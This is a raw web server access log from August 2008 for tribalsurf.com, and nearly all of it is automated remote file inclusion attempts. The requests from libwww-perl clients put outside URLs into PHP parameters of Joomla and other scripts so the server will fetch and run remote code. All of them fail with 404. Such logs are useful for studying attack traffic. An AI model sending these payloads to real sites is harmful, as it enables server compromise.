89.108.66.188 - - [31/Aug/2008:20:03:34 -0700] "GET /logs/errors.php?error=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.tribalsurf.com"
72.52.166.232 - - [31/Aug/2008:20:04:50 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/up.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
72.52.166.232 - - [31/Aug/2008:20:04:50 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/up.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
72.52.166.232 - - [31/Aug/2008:20:04:50 -0700] "GET /logs/access_080707.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/up.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
63.247.138.146 - - [31/Aug/2008:20:05:55 -0700] "GET /logs/access_080714.log//main.php?x=http://peru.americautos.com/images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.tribalsurf.com"
63.247.138.146 - - [31/Aug/2008:20:05:55 -0700] "GET //main.php?x=http://peru.americautos.com/images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.tribalsurf.com"
63.247.138.146 - - [31/Aug/2008:20:05:56 -0700] "GET /logs//main.php?x=http://peru.americautos.com/images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.tribalsurf.com"
69.16.217.88 - - [31/Aug/2008:20:06:05 -0700] "GET /logs/access_080707.log//include/bbs.lib.inc.php?site_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
69.16.217.88 - - [31/Aug/2008:20:06:05 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
69.16.217.88 - - [31/Aug/2008:20:06:05 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
88.84.157.43 - - [31/Aug/2008:20:06:37 -0700] "GET /logs/access.log//include/write.php?dir=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
88.84.157.43 - - [31/Aug/2008:20:06:37 -0700] "GET //include/write.php?dir=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
88.84.157.43 - - [31/Aug/2008:20:06:37 -0700] "GET /logs//include/write.php?dir=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
72.52.166.232 - - [31/Aug/2008:20:07:48 -0700] "GET /logs/access.log%20/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/up.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "tribalsurf.com"
89.108.66.188 - - [31/Aug/2008:20:08:00 -0700] "GET /logs/access.log/errors.php?error=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.tribalsurf.com"
70.84.193.130 - - [31/Aug/2008:20:08:26 -0700] "GET /logs/access.log//home.php?pagina=http://www.hotelsunflower.it/modules/rhs/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "tribalsurf.com"
70.84.193.130 - - [31/Aug/2008:20:08:26 -0700] "GET //home.php?pagina=http://www.hotelsunflower.it/modules/rhs/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "tribalsurf.com"
70.84.193.130 - - [31/Aug/2008:20:08:26 -0700] "GET /logs//home.php?pagina=http://www.hotelsunflower.it/modules/rhs/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "tribalsurf.com"
65.18.170.161 - - [31/Aug/2008:20:08:30 -0700] "GET //include/write.php?dir=http://geocities.com/chitoz.blues/idid.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
65.18.170.161 - - [31/Aug/2008:20:08:30 -0700] "GET /logs/access.log//include/write.php?dir=http://geocities.com/chitoz.blues/idid.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
65.18.170.161 - - [31/Aug/2008:20:08:30 -0700] "GET /logs//include/write.php?dir=http://geocities.com/chitoz.blues/idid.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
70.85.222.106 - - [31/Aug/2008:20:08:52 -0700] "GET //include/write.php?dir=http://geocities.com/chitoz.blues/idid.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.tribalsurf.com"
70.85.222.106 - - [31/Aug/2008:20:08:52 -0700] "GET /logs/access.log//include/write.php?dir=http://geocities.com/chitoz.blues/idid.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.tribalsurf.com"
70.85.222.106 - - [31/Aug/2008:20:08:52 -0700] "GET /logs//include/write.php?dir=http://geocities.com/chitoz.blues/idid.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.tribalsurf.com"
63.247.138.146 - - [31/Aug/2008:20:09:26 -0700] "GET /logs/access_080707.log//main.php?x=http://peru.americautos.com/images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.tribalsurf.com"
97.102.114.191 - - [31/Aug/2008:20:10:19 -0700] "GET /logs/access.log//include/write.php?dir=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
97.102.114.191 - - [31/Aug/2008:20:10:19 -0700] "GET //include/write.php?dir=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
97.102.114.191 - - [31/Aug/2008:20:10:19 -0700] "GET /logs//include/write.php?dir=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
70.84.193.130 - - [31/Aug/2008:20:11:46 -0700] "GET /logs/access_080707.log//home.php?pagina=http://www.hotelsunflower.it/modules/rhs/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.tribalsurf.com"
70.84.193.130 - - [31/Aug/2008:20:11:46 -0700] "GET /logs//home.php?pagina=http://www.hotelsunflower.it/modules/rhs/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.tribalsurf.com"
70.84.193.130 - - [31/Aug/2008:20:11:46 -0700] "GET //home.php?pagina=http://www.hotelsunflower.it/modules/rhs/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.tribalsurf.com"
88.84.157.43 - - [31/Aug/2008:20:11:47 -0700] "GET /logs/access.log//include/write.php?dir=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
88.84.157.43 - - [31/Aug/2008:20:11:48 -0700] "GET //include/write.php?dir=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
88.84.157.43 - - [31/Aug/2008:20:11:48 -0700] "GET /logs//include/write.php?dir=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
97.102.114.191 - - [31/Aug/2008:20:17:03 -0700] "GET /logs/access.log//include/write.php?dir=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
97.102.114.191 - - [31/Aug/2008:20:17:03 -0700] "GET //include/write.php?dir=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
97.102.114.191 - - [31/Aug/2008:20:17:04 -0700] "GET /logs//include/write.php?dir=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
74.53.98.146 - - [31/Aug/2008:20:18:26 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
74.53.98.146 - - [31/Aug/2008:20:18:27 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
74.53.98.146 - - [31/Aug/2008:20:18:27 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
67.19.216.122 - - [31/Aug/2008:20:22:43 -0700] "GET /logs/access.log//errors.php?error=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.tribalsurf.com"
67.19.216.122 - - [31/Aug/2008:20:22:43 -0700] "GET //errors.php?error=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.tribalsurf.com"
67.19.216.122 - - [31/Aug/2008:20:22:43 -0700] "GET /logs//errors.php?error=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.tribalsurf.com"
12.192.82.221 - - [31/Aug/2008:20:22:49 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "tribalsurf.com"
12.192.82.221 - - [31/Aug/2008:20:22:50 -0700] "GET //Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "tribalsurf.com"
12.192.82.221 - - [31/Aug/2008:20:22:50 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "tribalsurf.com"
64.202.116.5 - - [31/Aug/2008:20:23:30 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "tribalsurf.com"
64.202.116.5 - - [31/Aug/2008:20:23:30 -0700] "GET //Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "tribalsurf.com"
64.202.116.5 - - [31/Aug/2008:20:23:30 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "tribalsurf.com"
203.199.149.72 - - [31/Aug/2008:20:23:51 -0700] "GET /logs/access_080707.log/services.php?page=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.tribalsurf.com"
203.199.149.72 - - [31/Aug/2008:20:23:51 -0700] "GET /services.php?page=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.tribalsurf.com"
203.199.149.72 - - [31/Aug/2008:20:23:56 -0700] "GET /logs/services.php?page=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.tribalsurf.com"
74.53.98.146 - - [31/Aug/2008:20:25:47 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "tribalsurf.com"
74.53.98.146 - - [31/Aug/2008:20:25:47 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "tribalsurf.com"
74.53.98.146 - - [31/Aug/2008:20:25:47 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "tribalsurf.com"
207.249.0.39 - - [31/Aug/2008:20:28:09 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "tribalsurf.com"
207.249.0.39 - - [31/Aug/2008:20:28:09 -0700] "GET //Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "tribalsurf.com"
207.249.0.39 - - [31/Aug/2008:20:28:10 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "tribalsurf.com"
201.238.195.13 - - [31/Aug/2008:20:29:08 -0700] "GET /logs/access.log/homepage.php?sel=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "tribalsurf.com"
201.238.195.13 - - [31/Aug/2008:20:29:08 -0700] "GET /homepage.php?sel=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "tribalsurf.com"
201.238.195.13 - - [31/Aug/2008:20:29:09 -0700] "GET /logs/homepage.php?sel=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "tribalsurf.com"
12.192.82.221 - - [31/Aug/2008:20:29:56 -0700] "GET /logs/access_080721.log//Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
12.192.82.221 - - [31/Aug/2008:20:29:57 -0700] "GET //Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
12.192.82.221 - - [31/Aug/2008:20:29:57 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
77.222.40.169 - - [31/Aug/2008:20:31:32 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "tribalsurf.com"
77.222.40.169 - - [31/Aug/2008:20:31:32 -0700] "GET //Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "tribalsurf.com"
77.222.40.169 - - [31/Aug/2008:20:31:32 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "tribalsurf.com"
201.238.195.13 - - [31/Aug/2008:20:32:52 -0700] "GET /logs/access.log/homepage.php?sel=http://avast4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "tribalsurf.com"
201.238.195.13 - - [31/Aug/2008:20:32:53 -0700] "GET /homepage.php?sel=http://avast4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "tribalsurf.com"
201.238.195.13 - - [31/Aug/2008:20:32:53 -0700] "GET /logs/homepage.php?sel=http://avast4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "tribalsurf.com"
64.202.116.5 - - [31/Aug/2008:20:33:27 -0700] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.tribalsurf.com"
64.202.116.5 - - [31/Aug/2008:20:33:27 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.tribalsurf.com"
64.202.116.5 - - [31/Aug/2008:20:33:27 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.tribalsurf.com"
12.192.82.221 - - [31/Aug/2008:20:34:19 -0700] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
12.192.82.221 - - [31/Aug/2008:20:34:19 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
12.192.82.221 - - [31/Aug/2008:20:34:19 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
77.222.40.169 - - [31/Aug/2008:20:37:33 -0700] "GET /logs/access_080721.log//Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
77.222.40.169 - - [31/Aug/2008:20:37:34 -0700] "GET //Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
77.222.40.169 - - [31/Aug/2008:20:37:34 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
12.192.82.221 - - [31/Aug/2008:20:38:27 -0700] "GET /logs/access_080707.log//Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
12.192.82.221 - - [31/Aug/2008:20:38:27 -0700] "GET //Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
12.192.82.221 - - [31/Aug/2008:20:38:28 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
207.249.0.39 - - [31/Aug/2008:20:38:30 -0700] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
207.249.0.39 - - [31/Aug/2008:20:38:31 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
207.249.0.39 - - [31/Aug/2008:20:38:31 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
193.207.106.54 - - [31/Aug/2008:20:39:52 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
193.207.106.54 - - [31/Aug/2008:20:39:52 -0700] "GET //index.php?option=com_custompages&cpage=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
193.207.106.54 - - [31/Aug/2008:20:39:52 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
201.238.195.13 - - [31/Aug/2008:20:40:01 -0700] "GET /homepage.php?sel=http://http://dewa.yourfreehosting.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "tribalsurf.com"
64.202.116.5 - - [31/Aug/2008:20:41:03 -0700] "GET /logs/access_080707.log//Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.tribalsurf.com"
64.202.116.5 - - [31/Aug/2008:20:41:03 -0700] "GET //Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.tribalsurf.com"
64.202.116.5 - - [31/Aug/2008:20:41:03 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.tribalsurf.com"
201.238.195.13 - - [31/Aug/2008:20:41:15 -0700] "GET /homepage.php?sel=http://http://dewa.yourfreehosting.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
80.74.146.175 - - [31/Aug/2008:20:41:35 -0700] "GET //index.php?option=com_custompages&cpage=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
201.238.195.13 - - [31/Aug/2008:20:42:54 -0700] "GET /logs/access_080714.log/homepage.php?sel=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
201.238.195.13 - - [31/Aug/2008:20:42:54 -0700] "GET /homepage.php?sel=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
201.238.195.13 - - [31/Aug/2008:20:42:54 -0700] "GET /logs/homepage.php?sel=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
201.238.195.13 - - [31/Aug/2008:20:42:58 -0700] "GET /logs/access.log/homepage.php?sel=http://http://dewa.yourfreehosting.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "tribalsurf.com"
201.238.195.13 - - [31/Aug/2008:20:42:59 -0700] "GET /logs/homepage.php?sel=http://http://dewa.yourfreehosting.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "tribalsurf.com"
67.195.37.184 - - [31/Aug/2008:20:43:29 -0700] "GET /2005elementsfall HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "www.tribalsurf.com"
207.249.0.39 - - [31/Aug/2008:20:45:53 -0700] "GET /logs/access_080707.log//Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
207.249.0.39 - - [31/Aug/2008:20:45:53 -0700] "GET //Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
207.249.0.39 - - [31/Aug/2008:20:45:54 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
201.238.195.13 - - [31/Aug/2008:20:45:55 -0700] "GET /logs/access_080714.log/homepage.php?sel=http://avast4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
201.238.195.13 - - [31/Aug/2008:20:45:55 -0700] "GET /homepage.php?sel=http://avast4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
201.238.195.13 - - [31/Aug/2008:20:45:56 -0700] "GET /logs/homepage.php?sel=http://avast4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
77.74.192.227 - - [31/Aug/2008:20:47:42 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://sylacaugaonline.info/joomla/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "tribalsurf.com"
77.74.192.227 - - [31/Aug/2008:20:47:42 -0700] "GET //config/dbutil.bck.php?confdir=http://sylacaugaonline.info/joomla/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "tribalsurf.com"
77.74.192.227 - - [31/Aug/2008:20:47:42 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://sylacaugaonline.info/joomla/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "tribalsurf.com"
77.222.40.169 - - [31/Aug/2008:20:48:53 -0700] "GET /logs/access_080707.log//Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
77.222.40.169 - - [31/Aug/2008:20:48:53 -0700] "GET //Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
77.222.40.169 - - [31/Aug/2008:20:48:54 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
89.248.110.152 - - [31/Aug/2008:20:50:10 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
89.248.110.152 - - [31/Aug/2008:20:50:10 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
89.248.110.152 - - [31/Aug/2008:20:50:10 -0700] "GET //index.php?option=com_custompages&cpage=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
89.111.176.116 - - [31/Aug/2008:20:52:22 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
89.111.176.116 - - [31/Aug/2008:20:52:23 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
89.111.176.116 - - [31/Aug/2008:20:52:23 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
201.238.195.13 - - [31/Aug/2008:20:52:28 -0700] "GET /logs/access_080714.log/homepage.php?sel=http://http://dewa.yourfreehosting.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
201.238.195.13 - - [31/Aug/2008:20:52:29 -0700] "GET /logs/homepage.php?sel=http://http://dewa.yourfreehosting.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
195.68.226.130 - - [31/Aug/2008:20:53:48 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
195.68.226.130 - - [31/Aug/2008:20:53:49 -0700] "GET //include/lib.inc.php?site_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
195.68.226.130 - - [31/Aug/2008:20:53:49 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
87.101.4.49 - - [31/Aug/2008:20:55:14 -0700] "GET /logs/access.log//errors.php?DOCUMENT_ROOT=http://ontheribbon.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
87.101.4.49 - - [31/Aug/2008:20:55:14 -0700] "GET /logs//errors.php?DOCUMENT_ROOT=http://ontheribbon.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
87.101.4.49 - - [31/Aug/2008:20:55:14 -0700] "GET //errors.php?DOCUMENT_ROOT=http://ontheribbon.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
89.248.110.152 - - [31/Aug/2008:20:56:36 -0700] "GET /logs/access.log%20//index.php?option=com_custompages&cpage=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
